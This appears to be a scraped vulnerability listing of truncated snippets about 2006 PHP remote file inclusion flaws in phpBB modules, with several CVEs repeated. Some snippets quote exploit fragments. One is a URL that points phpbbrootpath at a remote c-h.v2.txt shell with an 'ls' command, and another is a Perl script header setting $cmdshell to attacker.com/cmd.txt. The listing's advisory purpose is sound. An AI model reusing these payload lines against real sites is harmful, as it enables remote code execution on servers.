CVE-2006-5326

PHP remote file inclusion vulnerability in language/lang/langcontactfaq.php in the Prillian French 0.8.0 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter. NOTE: the provenance of this information is unknown; the details ar...

CVE-2006-5325

Multiple PHP remote file inclusion vulnerabilities in Dimitri Seitz Security Suite IP Logger in dwingmods for phpBB allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 mkb.php, 2 iplogger.php, 3 adminboard2.php, or 4 adminlogger.php in includes/,...

CVE-2006-5325

CVE-2006-5325 refers to multiple PHP remote file inclusion vulnerabilities in Dimitri Seitz Security Suite IP Logger for phpBB (dwingmods). The vulnerability affects the includes/ scripts (mkb.php, iplogger.php, admin_board2.php, admin_logger.php) via a URL in the phpbb_root_path parameter, enabl...

CVE-2006-5326

CVE-2006-5326 describes a PHP remote file inclusion vulnerability in the Prillian French 0.8.0 and earlier module for phpBB, specifically in language/lang/lang_contact_faq.php. The underlying issue allows an attacker to execute arbitrary PHP code by supplying a URL in the phpbb_root_path paramete...

CVE-2006-5309

PHP remote file inclusion vulnerability in language/langfrench/langprillianfaq.php in the Prillian French 0.8.0 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-5312

PHP remote file inclusion vulnerability in shoutbox.php in the Ajax Shoutbox 0.0.5 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-5309

The CVE-2006-5309 issue affects the Prillian French module for phpBB (version 0.8.0 and earlier) and is triggered via the phpbb_root_path parameter in language/lang_french/lang_prillian_faq.php. The vulnerability allows remote attackers to execute arbitrary PHP code by supplying a crafted URL, en...

CVE-2006-5312

CVE-2006-5312 affects the Ajax Shoutbox 0.0.5 and earlier module for phpBB, where PHP remote file inclusion is possible via the phpbb_root_path parameter in shoutbox.php, allowing remote code execution. Exploitation details are supported by sources such as Exploit-DB and NVD, with a base AV:N/AC:...

CVE-2006-5309

PHP remote file inclusion vulnerability in language/langfrench/langprillianfaq.php in the Prillian French 0.8.0 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-5305

PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-5306

The CVE-2006-5306 entry concerns multiple PHP remote file inclusion flaws in the Journals System module for phpBB (version 1.0.2 RC2 and earlier). The vulnerability allows remote code execution by supplying a URL to the phpbb_root_path parameter in includes/journals_delete.php, includes/journals_...

CVE-2006-5301

CVE-2006-5301 is a PHP remote file inclusion vulnerability affecting the SpamBlockerMODv 1.0.2 (and earlier) module for phpBB. The flaw resides in includes/antispam.php where untrusted input supplied to the phpbb_root_path parameter can cause the server to include and execute arbitrary PHP code s...

CVE-2006-5305

The CVE-2006-5305 entry describes a PHP remote file inclusion vulnerability in lat2cyr.php for lat2cyr 1.0.1 and earlier phpBB modules. The flaw allows an attacker to execute arbitrary PHP code via a URL supplied in the phpbb_root_path parameter, enabling remote code execution. Affected component...

phpBB-iplogger.txt

Author: ReeM HacK Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site: www.arab4services.com Remote File Inclusion - Security Suite IP Logger http://site.com/path/includes/mkb.php?phpbbrootpath=http://www.arab4services.com/c-h.v2.txt?ls...

SpamBlockerMODv-1.0.2.txt

!/usr/bin/perl SpamBlockerMod package for phpBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://leo.vak.ru/devel/spamblocker/spamblockermodv1.0.2.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd =...

Phpbb-insert.txt

$ BiyoSecurity.Org & SecurityWall.Org $ Script Name : Phpbb insert module $ versions : 0.1.0 and 0.1.1 $ Risk : High $ Regard : KorsaN $ Thanks : Liz0zim , RMx , TRIP , DreamLord , Kubra $ Vulnerable File : functionsmoduser.php $ Vulnerable code : includeonce$phpbbrootpath...

PhPBB-user-posts.txt

!/usr/bin/perl Admin User Viewed Posts Tracker 1.0x PhPBB Hack Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.nivisec.com/downloads/phpbb/userviewedposts.zip use IO::Socket; use LWP::Simple;...

phpBB Amazonia Mod (zufallscodepart.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl AMAZONIA MOD for phpbb forums Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit

Exploit for unknown platform in category web applications =================================================================== phpBB PlusXL = 2.0272 constants.php Remote File Include Exploit =================================================================== !/usr/bin/perl phpBB PlusXL 2.X biuld 2...

phpBB Amazonia Mod - &#039;zufallscodepart.php&#039; Remote File Inclusion

!/usr/bin/perl AMAZONIA MOD for phpbb forums Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.superphotos.info...